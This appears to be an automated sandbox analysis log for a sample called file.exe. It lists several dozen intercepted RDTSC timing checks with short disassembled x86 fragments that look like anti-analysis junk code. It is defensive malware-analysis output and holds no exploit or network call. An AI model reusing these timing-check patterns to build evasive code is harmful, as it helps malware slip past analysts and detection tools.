              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2174E second address: 96EB39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F79A4C9A8F0h 0x0000000f push dword ptr [ebp+122D0A9Dh] 0x00000015 mov edi, dword ptr [ebp+122D2CA9h] 0x0000001b call dword ptr [ebp+122D1FBAh] 0x00000021 pushad 0x00000022 pushad 0x00000023 mov dword ptr [ebp+122D1CA1h], ecx 0x00000029 jno 00007F79A4C9A8EBh 0x0000002f popad 0x00000030 xor eax, eax 0x00000032 jmp 00007F79A4C9A8F6h 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b mov dword ptr [ebp+122D1CA1h], edx 0x00000041 mov dword ptr [ebp+122D2E11h], eax 0x00000047 jmp 00007F79A4C9A8EDh 0x0000004c mov esi, 0000003Ch 0x00000051 ja 00007F79A4C9A8F0h 0x00000057 pushad 0x00000058 mov dl, ah 0x0000005a mov ebx, dword ptr [ebp+122D2D1Dh] 0x00000060 popad 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 sub dword ptr [ebp+122D1CB8h], ecx 0x0000006b lodsw 0x0000006d pushad 0x0000006e add al, 00000060h 0x00000071 movzx eax, bx 0x00000074 popad 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jp 00007F79A4C9A8EEh 0x0000007f pushad 0x00000080 mov dword ptr [ebp+122D1CAAh], edx 0x00000086 popad 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b jmp 00007F79A4C9A8EEh 0x00000090 push eax 0x00000091 push eax 0x00000092 push edx 0x00000093 jmp 00007F79A4C9A8F9h 0x00000098 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21817 second address: B2185A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F79A547B38Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F79A547B396h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2185A second address: B21864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F79A4C9A8E6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2194F second address: B21954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21954 second address: B2196B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F79A4C9A8E8h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2196B second address: B21984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21984 second address: B219B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A4C9A8F3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F79A4C9A8F3h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21ABA second address: B21ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], esi 0x0000000d clc 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F79A547B38Ch 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21ADC second address: B21AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21AE2 second address: B21AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21DB4 second address: B21DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21DB8 second address: B21E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a jnc 00007F79A547B399h 0x00000010 jmp 00007F79A547B393h 0x00000015 push 00000004h 0x00000017 sbb cx, F860h 0x0000001c nop 0x0000001d jmp 00007F79A547B395h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jg 00007F79A547B386h 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21E03 second address: B21E17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B225B2 second address: B225B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6992A second address: B6992E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6992E second address: B69934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B69934 second address: B69942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F79A4C9A8EEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B69942 second address: B6995B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F79A547B38Eh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6995B second address: B69977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B69977 second address: B6997B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6997B second address: B6998B instructions: 0x00000000 rdtsc 0x00000002 je 00007F79A4C9A8E6h 0x00000008 jbe 00007F79A4C9A8E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5948 second address: AE5964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A547B396h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6CDB1 second address: B6CDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A4C9A8F8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F79A4C9A8E6h 0x00000012 jmp 00007F79A4C9A8F1h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6CDE7 second address: B6CE09 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79A547B386h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F79A547B392h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA9D8 second address: AEA9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA9DC second address: AEA9E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA9E0 second address: AEA9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F79A4C9A8ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7515B second address: B75171 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F79A547B38Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75171 second address: B75175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75175 second address: B75199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A547B396h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75199 second address: B751B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F79A4C9A8ECh 0x0000000d jnl 00007F79A4C9A8E6h 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79B22 second address: B79B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78D6B second address: B78D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F79A4C9A8E6h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78D78 second address: B78D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F79A547B386h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78ECF second address: B78F1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F7h 0x00000007 jmp 00007F79A4C9A8F8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F79A4C9A8F1h 0x00000013 js 00007F79A4C9A8FFh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B791AA second address: B791C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jmp 00007F79A547B394h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B791C6 second address: B791DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push esi 0x00000008 jmp 00007F79A4C9A8EDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B792F7 second address: B792FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B792FD second address: B7930D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7930D second address: B79313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79605 second address: B79663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jnc 00007F79A4C9A907h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F79A4C9A8F8h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jbe 00007F79A4C9A8E6h 0x00000022 jbe 00007F79A4C9A8E6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79663 second address: B79668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79668 second address: B79679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8EDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E279 second address: B7E27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E420 second address: B7E425 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E594 second address: B7E598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E598 second address: B7E5AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E5AA second address: B7E5B4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F79A547B386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7EAEF second address: B7EAF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88BAF second address: B88BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F79A547B391h 0x00000013 jng 00007F79A547B386h 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86D55 second address: B86D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F79A4C9A8E6h 0x0000000a popad 0x0000000b jne 00007F79A4C9A8EAh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F79A4C9A8EEh 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86D77 second address: B86D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86D7B second address: B86D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86D83 second address: B86D9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B390h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86F0A second address: B86F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 ja 00007F79A4C9A8F2h 0x0000000d jmp 00007F79A4C9A8ECh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86F23 second address: B86F4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B391h 0x00000007 push ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F79A547B38Ch 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86F4C second address: B86F54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87475 second address: B8747C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8747C second address: B8748B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8748B second address: B8748F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8748F second address: B87495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87495 second address: B8749B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87A26 second address: B87A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87CD8 second address: B87CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87CDC second address: B87CF0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F79A4C9A8E6h 0x00000008 jno 00007F79A4C9A8E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87CF0 second address: B87CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87CF6 second address: B87CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87CFA second address: B87D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F79A547B38Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B882F9 second address: B88313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F79A4C9A8ECh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8860B second address: B88619 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79A547B386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88619 second address: B8861D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8861D second address: B88623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B88623 second address: B8862A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8862A second address: B8864A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F79A547B38Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F79A547B38Bh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E701 second address: B8E70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E70B second address: B8E711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B92757 second address: B9275B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9275B second address: B92778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A547B392h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91DD6 second address: B91E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F79A4C9A8F0h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F79A4C9A8F4h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9224C second address: B92266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A547B396h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B92266 second address: B92270 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79A4C9A8E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9C081 second address: B9C087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A70C second address: B9A727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F79A4C9A8F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A727 second address: B9A747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F79A547B38Bh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A747 second address: B9A761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AA31 second address: B9AA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F79A547B38Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F79A547B393h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B017 second address: B9B01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B01C second address: B9B041 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79A547B39Fh 0x00000008 jmp 00007F79A547B397h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B14D second address: B9B154 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B7EF second address: B9B7F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9B7F3 second address: B9B7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9BF28 second address: B9BF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
